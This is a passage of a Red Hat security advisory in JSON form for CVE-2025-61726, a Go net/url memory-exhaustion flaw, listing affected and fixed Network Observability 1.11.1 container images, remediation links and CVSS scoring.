"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
